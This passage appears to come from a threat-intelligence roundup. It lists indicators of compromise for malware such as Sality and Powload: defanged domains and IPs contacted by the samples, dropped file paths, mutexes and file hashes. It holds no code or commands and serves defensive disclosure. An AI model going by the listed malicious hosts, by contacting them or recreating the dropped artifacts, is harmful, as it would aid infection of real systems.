Does not indicate maliciousness<br /><ul><li>www[.]aaaplating[.]com</li><li>weighcase[.]co[.]uk</li></ul><b>Files and or directories created</b><br /><ul><li>%LocalAppData%\Temp\VBE\MSForms.exd</li><li>%AppData%\Microsoft\Excel\XLSTART</li><li>%UserProfile%\Documents\20181119</li><li>%TEMP%\tmp907.bat</li><li>%LocalAppData%\Temp\tmp016.exe</li><li>%LocalAppData%\Temp\CVR4F0E.tmp</li><li>%LocalAppData%\Temp\twaibr0n.00s.ps1</li></ul><b>File Hashes</b><br /><ul><li>199f1eec8413168be6418ace60cfe760d858350ebef3605aa91d47338b881e0c</li><li>1f444338e19212dfe5f597ceb3b55f06a8b927a342ce50d0c5ae4452d4999e80</li><li>49fbb593eb1418ecbbefd3ac0529ccf1ed2ef64e20927a5e0379f99ec9fd0c9b</li><li>5ac6fb69b5c55ec6419b89e22ce7fd873d11d263ae2eda9ff85e8eda10b20444</li><li>644f8f3822eb0c5435ffbec711a0b2821e1fa050ca10c837a62c02a9df814d9d</li><li>77f27841d4263d1ed6ba59267d78a454c9a2a3383ee3f1a2a5ddbed4e835dd06</li><li>83cf5c7623bc92966e02b594bb41ab3896b1ffaae748d7cc9b4331f3f435f171</li><li>9a422430a9443b77b5959847657ec411736e180b30563b5066d1ea0c7b22633e</li><li>9bfd539bb55f7a7a5a8df5a0e3ecd87157ecd87675915ac01ca6ce62a3402872</li><li>9dbd2fc30b9c22fb03df72eb46ea83af41449bb6054cdf8cd83e5520de633641</li><li>a46e400bbf7b921a5b2e131ac3c8bf10506569466ad3fff99381c411e585192d</li><li>a6043595251b41b336ca8bc2ccc05bc2bf2781274c1893d6943141a4bd3cf637</li><li>a6d95c0eac0c0b584faa37c1e21ee5baad74e227685275899a9d8c5ac2806b9d</li><li>be6ac030af25e2044cf8889d747fa170bcbb10a325a3f05f67194379f86375ca</li><li>c7c3ded9554e8ca38031ab080c1ed9d775a20ac928eaded8d24fb325d7c6be1f</li><li>cba2b5d0949ff517c40f74cf166b7c363dbf54bda30d4e8432f31da674a78b9c</li><li>e4fcc415e1f7cec20991a6e5612c7706c1187e23ecea5115fbeea824c9b06c14</li><li>efd04977ffd67e71dc9730268a7cee0b85ca128c0e0e3962b073494e5e9f2081</li><li>f495fc57c7bd8311cee17ea6dc15c953d21c5fd97147e632a509b07217855501</li></ul><br /><h4>Coverage</h4><div class="separator" style="clear: both; text-align: center;"><a 
href="https://1.bp.blogspot.com/-9t2Of3KWq7I/Wz-6a6Dy3kI/AAAAAAAAAbk/5J2B6tJuFS44Fz9CyF7x9wPcTvmCLrV1gCLcBGAs/s320/all-selected-except-cloudlock.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://1.bp.blogspot.com/-9t2Of3KWq7I/Wz-6a6Dy3kI/AAAAAAAAAbk/5J2B6tJuFS44Fz9CyF7x9wPcTvmCLrV1gCLcBGAs/s320/all-selected-except-cloudlock.png" /></a> </div><br /><h4>Screenshots of Detection</h4><b>AMP</b><br /><b><br /></b><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-O5JdcyLFXlw/XBP9G9KIhyI/AAAAAAAABSU/Fb8-1HfmyYc46Uk0ms3c3jNo9oDjwfHZwCLcBGAs/s1600/efd04977ffd67e71dc9730268a7cee0b85ca128c0e0e3962b073494e5e9f2081_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="481" data-original-width="702" height="272" src="https://1.bp.blogspot.com/-O5JdcyLFXlw/XBP9G9KIhyI/AAAAAAAABSU/Fb8-1HfmyYc46Uk0ms3c3jNo9oDjwfHZwCLcBGAs/s400/efd04977ffd67e71dc9730268a7cee0b85ca128c0e0e3962b073494e5e9f2081_amp.png" width="400" /></a></div><b><br /></b><br /><b>ThreatGrid</b><br /><b><br /></b><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-7wUWniPcHQs/XBP9Lcai8OI/AAAAAAAABSc/__MyYjcDftcS9oUxDgtP-P_65Ozx-w06ACLcBGAs/s1600/efd04977ffd67e71dc9730268a7cee0b85ca128c0e0e3962b073494e5e9f2081_tg.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="801" data-original-width="962" height="532" src="https://3.bp.blogspot.com/-7wUWniPcHQs/XBP9Lcai8OI/AAAAAAAABSc/__MyYjcDftcS9oUxDgtP-P_65Ozx-w06ACLcBGAs/s640/efd04977ffd67e71dc9730268a7cee0b85ca128c0e0e3962b073494e5e9f2081_tg.png" width="640" /></a></div><b><br /></b><br /><b>Umbrella</b><br /><b><br /></b><br /><div class="separator" style="clear: both; text-align: center;"><a 
href="https://3.bp.blogspot.com/-yredc2BiSPk/XBP9QAeSJiI/AAAAAAAABSg/14wk9FmahHEtqNmAs3wj09j8eoshZ3tdwCLcBGAs/s1600/efd04977ffd67e71dc9730268a7cee0b85ca128c0e0e3962b073494e5e9f2081_umbrella.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="272" data-original-width="870" height="200" src="https://3.bp.blogspot.com/-yredc2BiSPk/XBP9QAeSJiI/AAAAAAAABSg/14wk9FmahHEtqNmAs3wj09j8eoshZ3tdwCLcBGAs/s640/efd04977ffd67e71dc9730268a7cee0b85ca128c0e0e3962b073494e5e9f2081_umbrella.png" width="640" /></a></div><b><br /></b><br /><b>Malware</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-a-Jhj8mpZhI/XBP9VfQ6UtI/AAAAAAAABSk/Dg-YJgmbjmwLGhrUBhf5QwnvzU7zg_xkQCLcBGAs/s1600/efd04977ffd67e71dc9730268a7cee0b85ca128c0e0e3962b073494e5e9f2081_malware.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1024" height="480" src="https://2.bp.blogspot.com/-a-Jhj8mpZhI/XBP9VfQ6UtI/AAAAAAAABSk/Dg-YJgmbjmwLGhrUBhf5QwnvzU7zg_xkQCLcBGAs/s640/efd04977ffd67e71dc9730268a7cee0b85ca128c0e0e3962b073494e5e9f2081_malware.png" width="640" /></a></div><br /><br /><h3>Win.Virus.Sality-6780277-0</h3><br /><h4>Indicators of Compromise</h4><br /><b>Registry Keys</b><br /><ul><li>N/A</li></ul><b>Mutexes</b><br 
/><ul><li>uxJLpe1m</li><li>wininit.exeM_320_</li><li>winlogon.exeM_356_</li><li>wudfhost.exeM_1644_</li><li>\BaseNamedObjects\uxJLpe1m</li><li>\BaseNamedObjects\csrss.exeM_528_</li><li>\BaseNamedObjects\services.exeM_664_</li><li>\BaseNamedObjects\lsass.exeM_676_</li><li>\BaseNamedObjects\svchost.exeM_1008_</li><li>\BaseNamedObjects\smss.exeM_364_</li><li>\BaseNamedObjects\spoolsv.exeM_1560_</li><li>\BaseNamedObjects\winlogon.exeM_552_</li><li>\BaseNamedObjects\ctfmon.exeM_204_</li><li>\BaseNamedObjects\svchost.exeM_912_</li><li>\BaseNamedObjects\userinit.exeM_1372_</li><li>\BaseNamedObjects\svchost.exeM_832_</li><li>\BaseNamedObjects\jqs.exeM_1736_</li><li>\BaseNamedObjects\rundll32.exeM_948_</li><li>\BaseNamedObjects\explorer.exeM_1456_</li><li>\BaseNamedObjects\svchost.exeM_1116_</li><li>\BaseNamedObjects\wmiprvse.exeM_440_</li><li>wmiprvse.exeM_776_</li><li>\BaseNamedObjects\wmiadap.exeM_3280_</li><li>\BaseNamedObjects\356677150.exeM_1408_</li><li>\BaseNamedObjects\wmiprvse.exeM_1688_</li></ul><b>IP Addresses</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>N/A</li></ul><b>Domain Names</b> contacted by malware. 
Does not indicate maliciousness<br /><ul><li>N/A</li></ul><b>Files and or directories created</b><br /><ul><li>\??\E:\autorun.inf</li><li>%System32%\drivers\lhlnn.sys</li><li>%SystemDrive%\Documents and Settings\Administrator\Cookies\administrator@cargocrystal[1].txt</li><li>%SystemDrive%\Documents and Settings\Administrator\Cookies\administrator@cargocrystal[2].txt</li><li>%SystemDrive%\Documents and Settings\Administrator\Cookies\administrator@samayer[1].txt</li><li>%LocalAppData%\Temp\wingqijig.exe</li><li>%SystemDrive%\okieu.exe</li><li>\??\E:\mshy.pif</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\augx.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\bvwf.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\ceohbt.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\cevjx.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\dkgn.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\easrrv.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\gekhk.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\glya.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\hpqd.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\ixway.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\jbccl.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\jhrim.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\jvuj.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\kdpw.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\kwih.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\lmbonl.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\lpig.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\ltyyd.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\mqsr.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\mskjgp.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\mslmw.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\ndcdl.exe</li><li>%SystemDrive%\DOCUME~1\ADMI
NI~1\LOCALS~1\Temp\niut.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\nixbf.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\nygs.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\olsit.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\ospd.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\pffcy.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\rfioy.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\rxoqk.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tguha.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tvuin.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\uspe.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\vkecy.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\vtba.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\vxqq.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\vylwe.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\whtfo.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winadpngm.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winasew.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winauunwn.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winbkjyy.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winbpcf.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winbusg.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\windlwd.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\windpbi.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\wineeyux.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winesrg.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winfjvcgs.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winfpmye.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winiuak.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winjenpka.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winjkyn.exe</li><li>%SystemD
rive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winkqxb.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winkrepqp.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winktee.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winlbehwb.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winlihxj.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winlsbpg.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winlxanm.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winlywa.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winmtfju.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winneng.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winnjxa.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winnurxrn.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winodpm.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winohuuif.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winolmyt.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winonwqwp.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winpcpvjx.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winpdae.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winpdgmo.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winpgqpu.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winpmlm.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winpnsv.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winpuybd.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\wintqckmy.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winudusnh.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winuixn.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winvcwb.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winvxxb.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winwbnx.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winwbppmo.exe</li><li>%S
ystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winydntxg.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winyksvqi.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winyqksg.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\xfkklk.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\xgvmsf.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\xmjmf.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\xwota.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\yxjkrt.exe</li><li>%SystemDrive%\eetdut.exe</li></ul><b>File Hashes</b><br /><ul><li>02e3ca0b78494efa9c54f41856fbf50478673329ea238c7786bdeb30542e5ed5</li><li>034336a710468f49c1eed9d375a85d4d7f48ecc271dde830f60b428d52a94c2b</li><li>0a9a606be52079bc06d34ee969313e58809c8bf4978e31101ce329b7651f564e</li><li>2055ba5f6fa09c201359729adc6c0e20ad97346d698b5801b601d29a85e78c52</li><li>34b3a1c08a185f7755b8fe3f741e13a6452b46766b2b564cd329c45bd45e1c76</li><li>38764b867874a08bd44e8a4b78b670e7445f93af546fba0443c99f56d469a951</li><li>3bd14203a0587eea25421d679fc5d7c598464e5fde6f39cf7e6a506fa86aaf5c</li><li>40d8f51d911e4f4d3fa29fcd39adc9e826557727dc1ec411404d6bd09c7f8c35</li><li>518b8b1dea7caf5f1c2d9b6f6ef32ba70effc2f74ebd7a902434fc66e179700e</li><li>609dcb6f088836745f24a24d71b49e092196b08a9924f42e8b63b92f4c0ebe24</li><li>6f8fec09c16a0f5bb60e3ec4cd1a41cb34a2eaa59d0351f5f875a83dd7ec8411</li><li>76cb38ecf5c3b925e946b6da3cc78e25e0df6db48c66073a6dc33bb8bc03cb5c</li><li>78784ee614b06d505879ec8454a80843416aa89869ecfb7eb059aadb14027178</li><li>7d5787833d365d5a2d84c0e6135106bd6d5a49de4da86857995cf0222491c028</li><li>8089f6db67efb482755dfc06ee4efe7271e685136e46a231b06bff87aca4393b</li><li>9af10868ac775ec789e3b9e7475015c3ba66f9ed35aabcfe8ea323b9b1a8d7a5</li><li>9fadad87f4763f5a062c0c12677b3b549f9df261484ad89cf58bb60809751e9c</li><li>a543f5d10445af1ce7710cc596b2b6ab0532cef51e9041b8f8c58bd36b218dd9</li><li>ac9ee5d47307f578e1a19a96dfb509a5063045a339ffcf1dc79f6a559f6385c3</li><li>c3a88516553f23807115597
f99f0b8f9e8a62c68bf7ee321bf1ff6c599c3c8f1</li><li>c96d2cd51eff903958ccc279fa48e392e858403aead3add4b00e6e9b031d5754</li><li>d2da9a2988364a576679489265765e8bd5419ea66e8aea48e666a5300f2c5e6f</li><li>e080790b62f025fedc93b161dc061421ae47cf4785ecb1744d6da1be44f8667a</li><li>e1a951d34a0c35cc5a011242189ed82707d3fc40289b37470169703f269d88f4</li><li>e1d9701b9af405e448e57714ee762722c3ddc6306d271038c350b0cfc138cebc</li></ul><br /><h4>Coverage</h4><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-9t2Of3KWq7I/Wz-6a6Dy3kI/AAAAAAAAAbk/5J2B6tJuFS44Fz9CyF7x9wPcTvmCLrV1gCLcBGAs/s320/all-selected-except-cloudlock.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://1.bp.blogspot.com/-9t2Of3KWq7I/Wz-6a6Dy3kI/AAAAAAAAAbk/5J2B6tJuFS44Fz9CyF7x9wPcTvmCLrV1gCLcBGAs/s320/all-selected-except-cloudlock.png" /></a> </div><br /><h4>Screenshots of Detection</h4><b>AMP</b><br /><b><br /></b><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-UpMlXO6trVE/XBP9m0y7GJI/AAAAAAAABS0/zQOXL2fjIqYiMy-TbTr48GkmFyfqxu5GQCLcBGAs/s1600/3bd14203a0587eea25421d679fc5d7c598464e5fde6f39cf7e6a506fa86aaf5c_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="481" data-original-width="702" height="272" src="https://2.bp.blogspot.com/-UpMlXO6trVE/XBP9m0y7GJI/AAAAAAAABS0/zQOXL2fjIqYiMy-TbTr48GkmFyfqxu5GQCLcBGAs/s400/3bd14203a0587eea25421d679fc5d7c598464e5fde6f39cf7e6a506fa86aaf5c_amp.png" width="400" /></a></div><b><br /></b><br /><b>ThreatGrid</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-3GDbZ6rULQs/XBP9riksPKI/AAAAAAAABS4/F1GUgLWhotI2V53CndYABOwu1skebOEeACLcBGAs/s1600/3bd14203a0587eea25421d679fc5d7c598464e5fde6f39cf7e6a506fa86aaf5c_tg.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="801" 
data-original-width="962" height="532" src="https://3.bp.blogspot.com/-3GDbZ6rULQs/XBP9riksPKI/AAAAAAAABS4/F1GUgLWhotI2V53CndYABOwu1skebOEeACLcBGAs/s640/3bd14203a0587eea25421d679fc5d7c598464e5fde6f39cf7e6a506fa86aaf5c_tg.png" width="640" /></a></div><br /><br /><b>Umbrella</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://4.bp.blogspot.com/-pqpP8WO98LY/XBP90TehqqI/AAAAAAAABS8/pv8PQek8YY49_q121AtlzlCwkJ5m9Ss6wCLcBGAs/s1600/3bd14203a0587eea25421d679fc5d7c598464e5fde6f39cf7e6a506fa86aaf5c_umbrella.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="272" data-original-width="870" height="200" src="https://4.bp.blogspot.com/-pqpP8WO98LY/XBP90TehqqI/AAAAAAAABS8/pv8PQek8YY49_q121AtlzlCwkJ5m9Ss6wCLcBGAs/s640/3bd14203a0587eea25421d679fc5d7c598464e5fde6f39cf7e6a506fa86aaf5c_umbrella.png" width="640" /></a></div><br /><br /><b>Malware</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://4.bp.blogspot.com/-grY0ueX0ORc/XBP956868WI/AAAAAAAABTA/7RxVXMA_IcEljKxWRlhgLsEus1YnTsbVACLcBGAs/s1600/78784ee614b06d505879ec8454a80843416aa89869ecfb7eb059aadb14027178_malware.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1024" height="480" src="https://4.bp.blogspot.com/-grY0ueX0ORc/XBP956868WI/AAAAAAAABTA/7RxVXMA_IcEljKxWRlhgLsEus1YnTsbVACLcBGAs/s640/78784ee614b06d505879ec8454a80843416aa89869ecfb7eb059aadb14027178_malware.png" width="640" /></a></div><br /><br /><h3>Doc.Malware.Powload-6775735-0</h3><br /><h4>Indicators of Compromise</h4><br /><b>Registry Keys</b><br /><ul><li>N/A</li></ul><b>Mutexes</b><br 
/><ul><li>Global\552FFA80-3393-423d-8671-7BA046BB5906</li><li>Local\ZonesCacheCounterMutex</li><li>Local\ZonesLockedCacheCounterMutex</li><li>RasPbFile</li><li>Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-2580483871-590521980-3826313501-500</li><li>Global\MTX_MSO_AdHoc1_S-1-5-21-2580483871-590521980-3826313501-500</li><li>Global\MTX_MSO_Formal1_S-1-5-21-2580483871-590521980-3826313501-500</li><li>Local\10MU_ACB10_S-1-5-5-0-57527</li><li>Local\10MU_ACBPIDS_S-1-5-5-0-57527</li><li>Local\WinSpl64To32Mutex_e162_0_3000</li><li>\BaseNamedObjects\Global\.net clr networking</li></ul><b>IP Addresses</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>199[.]188[.]200[.]110</li><li>185[.]72[.]59[.]32</li><li>185[.]87[.]51[.]118</li><li>185[.]2[.]4[.]116</li><li>177[.]185[.]194[.]161</li></ul><b>Domain Names</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>www[.]w3[.]org</li><li>tecleweb[.]com[.]br</li><li>chiporestaurante[.]com</li><li>www[.]onecubeideas[.]com</li><li>onecubeideas[.]com</li><li>dc[.]amegt[.]com</li><li>fortools[.]ru</li></ul><b>Files and or directories created</b><br /><ul><li>%WinDir%\ServiceProfiles\LocalService\AppData\Local\lastalive0.dat</li><li>%WinDir%\ServiceProfiles\LocalService\AppData\Local\lastalive1.dat</li><li>%LocalAppData%\Microsoft\Windows\Temporary Internet 
Files\Content.Word\~WRS{257D7FC1-A1F1-4741-80E5-4CCDA3324B78}.tmp</li><li>%AppData%\Microsoft\Templates\~$Normal.dotm</li><li>%AppData%\Microsoft\Word\STARTUP</li><li>%AppData%\Microsoft\Office\Recent\index.dat</li><li>\EVENTLOG</li><li>\ROUTER</li><li>%UserProfile%\Documents\20181207</li><li>%LocalAppData%\Temp\705.exe</li><li>%LocalAppData%\Temp\CVR8C5B.tmp</li><li>%AppData%\Microsoft\Office\Recent\355848530.doc.LNK</li><li>%SystemDrive%\~$5848530.doc</li><li>%LocalAppData%\Temp\fjzx2n2i.cc2.ps1</li><li>%LocalAppData%\Temp\qfrje44a.wpp.psm1</li><li>%LocalAppData%\Temp\~DF25D3033E1B874DBC.TMP</li><li>%AppData%\Microsoft\Office\Recent\37c08bc14f578f0b19f992648c113e46dc49e0ad1ddc9cd2e63dfb9242fe151c.LNK</li></ul><b>File Hashes</b><br /><ul><li>02c58585c45ba7f87a94eb10fda2ad3d1216dae821536c77bd1f53b5b48730cf</li><li>0aac7ab733c51437873bf791b28557b12e027bf9bf1b3eafcde05388010af655</li><li>0cc53d287e5df9017989526addc988b49fcd76894032458720acad7c265df9de</li><li>14ab7c3501e5ea1482687558d1544698b85cd9b24b3580245a85ce0b781c03e7</li><li>1af67c800700954695d42c3e124753750016b7c598c6fa2f9bcd9f85723dd1c6</li><li>1bfc31debc05dc83864b01ddf300552ec6496cc0d1c25b5846fcd2a4c5da93df</li><li>1e0c90f629beae558c6af53c3def9cda4bc77d06cd42131b8f969ff0da9afe25</li><li>1ff1729697c956aa4270731f63686d2f6aa1e86a47d219f32058fa67be31817f</li><li>21982965fc5661c509d1833f8fe9caf02d7649619b7b542d7a735abd7936a9cd</li><li>21e781747a69ebeda636616b47fdd4ff871b9c672aad10f3cf95cbd55eb8b169</li><li>239fea895e2a4a3bd3c3339ce48b2f330bd611d8120e0937aca1c8581e977849</li><li>2759147c5b948b705943cc4dfe7932aaeb14bda833ed00a850d1ee5543bac6c3</li><li>2b3064f31f52b8d33a9a7f73c1624252f4a2b615df0c99b4c70b4c617eed87fa</li><li>2c97f2997575df803d28dd38636856fd0efb9fa7efaea22c526b8dc71daa9aee</li><li>370c83daaa8ad3c9e1f684ac93a5c7436e86bab917f8511544792f083fd8d127</li><li>37c08bc14f578f0b19f992648c113e46dc49e0ad1ddc9cd2e63dfb9242fe151c</li><li>3ac2d948a193f03d6d6bbd288ab9ae2b58588567e459aecae80a66e00a291847</li><li>3b958d
f2dedb42704c2baf7b9dff89112db8e8297a594ebe98303f9913004e9b</li><li>54bf05efacb556c7ed106a9b802619b2f038d1e6b8adbcf4c8d632f8531e68be</li><li>56de2fad613807e46613e7159681a962cc8c54fc6ed20c7c3e90e104cdbfeaff</li><li>590cb8e2648bc9566d2709a22d33369309e32ddfcf6cf725dfce6b0efb2b51b3</li><li>5a2763ea3481568a73456a2e784b6b31b32845ec08df99b3394533ecdb0f973a</li><li>5f47e689fb44578d43e4c7590ce10c275f7f533c894387086bf5e0bb3a68e46d</li><li>626ead7063f00752432c54dcb61975b060e306f2712fa2fb1e6f3aa4cc406e1a</li><li>6714f37afcbe1d0685770f9558c40d0856e7c337f8d4c4beb7e312672adda950</li></ul><br /><h4>Coverage</h4><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-9t2Of3KWq7I/Wz-6a6Dy3kI/AAAAAAAAAbk/5J2B6tJuFS44Fz9CyF7x9wPcTvmCLrV1gCLcBGAs/s320/all-selected-except-cloudlock.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://1.bp.blogspot.com/-9t2Of3KWq7I/Wz-6a6Dy3kI/AAAAAAAAAbk/5J2B6tJuFS44Fz9CyF7x9wPcTvmCLrV1gCLcBGAs/s320/all-selected-except-cloudlock.png" /></a> </div><br /><h4>Screenshots of Detection</h4><b>AMP</b><br /><b><br /></b><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-hirdB2Bsdns/XBP-K0vfhaI/AAAAAAAABTQ/y0eonBwQeK8TKlcR2sZEt4BVHPJC_r_FgCLcBGAs/s1600/2759147c5b948b705943cc4dfe7932aaeb14bda833ed00a850d1ee5543bac6c3_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="481" data-original-width="702" height="272" src="https://2.bp.blogspot.com/-hirdB2Bsdns/XBP-K0vfhaI/AAAAAAAABTQ/y0eonBwQeK8TKlcR2sZEt4BVHPJC_r_FgCLcBGAs/s400/2759147c5b948b705943cc4dfe7932aaeb14bda833ed00a850d1ee5543bac6c3_amp.png" width="400" 